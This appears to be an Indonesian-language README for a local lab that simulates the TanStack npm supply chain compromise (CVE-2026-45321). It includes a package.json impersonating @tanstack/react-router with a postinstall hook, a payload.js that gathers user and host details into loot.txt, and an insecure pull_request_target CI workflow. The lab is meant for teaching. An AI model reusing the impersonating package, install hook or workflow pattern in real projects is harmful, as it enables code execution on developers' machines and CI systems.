Share
## https://sploitus.com/exploit?id=43EA2676-F6A7-5495-BC0C-CF1D17FE0EDE
# Simulasi Supply Chain Attack โ€” CVE-2026-45321 (TanStack)

> Educational Lab for Understanding npm Supply Chain Attacks, CI/CD Abuse, and Install-Time Code Execution

## Disclaimer

Project ini dibuat hanya untuk:

* pembelajaran keamanan siber,
* riset defensive security,
* simulasi local lab,
* memahami konsep supply chain attack.

Jangan gunakan project ini untuk:

* menyerang sistem nyata,
* mencuri credential,
* malware deployment,
* unauthorized access,
* atau aktivitas ilegal lainnya.

---

# Deskripsi

Lab ini mensimulasikan konsep dasar dari insiden:

* CVE-2026-45321
* TanStack npm Supply Chain Compromise
* GitHub Actions CI/CD Abuse
* npm Lifecycle Script Execution

Simulasi dilakukan secara lokal dan aman tanpa:

* credential stealing nyata,
* token exfiltration,
* atau kompromi layanan pihak ketiga.

---

# Struktur Lab

```bash
lab/
โ”œโ”€โ”€ fake-repo/          # Simulasi repository target
โ”œโ”€โ”€ attacker-package/   # Simulasi package malicious
โ””โ”€โ”€ victim-project/     # Simulasi korban
```

---

# Cara Kerja Simulasi

```text
Attacker Package
        โ†“
npm install
        โ†“
postinstall script berjalan
        โ†“
payload.js dieksekusi otomatis
        โ†“
Korban terkena install-time execution
```

---

# Konsep yang Dipelajari

* npm lifecycle hooks
* install-time arbitrary code execution
* supply chain attack
* CI/CD trust boundary
* malicious npm package
* postinstall abuse
* dependency compromise

---

# Instalasi

## 1. Clone Repository

```bash
https://github.com/renewablehacking/CVE-2026-45321-Tanstack.git

cd CVE-2026-45321-Tanstack
```

---

# Setup Attacker Package

## 2. Masuk ke Folder Attacker Package

```bash
cd attacker-package
```

---

## 3. Install Dependency

```bash
npm install
```

---

## 4. Build Tarball Package

```bash
npm pack
```

Hasil:

```bash
tanstack-react-router-1.169.5.tgz
```

---

# Simulasi Victim

## 5. Masuk ke Victim Project

```bash
cd ../victim-project
```

---

## 6. Install Malicious Package

```bash
npm install ../attacker-package/tanstack-react-router-1.169.5.tgz --foreground-scripts
```

---

# Output

Jika berhasil maka akan muncul:

```bash
=== MALICIOUS PAYLOAD EXECUTED ===
```

dan file:

```bash
loot.txt
```

akan dibuat secara otomatis.

---

# Contoh payload.js

```js
const os = require('os');
const fs = require('fs');

console.log("=== MALICIOUS PAYLOAD EXECUTED ===");

const info = `
USER=${process.env.USER}
HOST=${os.hostname()}
PLATFORM=${os.platform()}
`;

console.log(info);

fs.writeFileSync("loot.txt", info);
```

---

# Contoh package.json

```json
{
  "name": "@tanstack/react-router",
  "version": "1.169.5",
  "scripts": {
    "postinstall": "node payload.js"
  }
}
```

---

# Simulasi CI/CD

Project ini juga dapat digunakan untuk memahami:

* GitHub Actions
* pull_request_target
* CI/CD privilege boundary
* dependency execution

Contoh workflow:

```yaml
name: CI

on:
  pull_request_target:

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4

      - run: npm install
```

---

# Hubungan dengan CVE-2026-45321

| Simulasi Lab     | Dunia Nyata                  |
| ---------------- | ---------------------------- |
| attacker-package | compromised TanStack package |
| payload.js       | malicious installer          |
| postinstall      | lifecycle hook abuse         |
| victim-project   | developer/CI korban          |
| fake-repo        | GitHub Actions pipeline      |

---

# Referensi

* https://nvd.nist.gov/vuln/detail/CVE-2026-45321
* https://tanstack.com/blog/npm-supply-chain-compromise-postmortem
* https://docs.npmjs.com/cli/v10/using-npm/scripts
* https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions

---

# Educational Purpose Only

Lab ini dibuat untuk meningkatkan awareness mengenai:

* keamanan supply chain,
* keamanan dependency,
* keamanan CI/CD,
* dan defensive security research.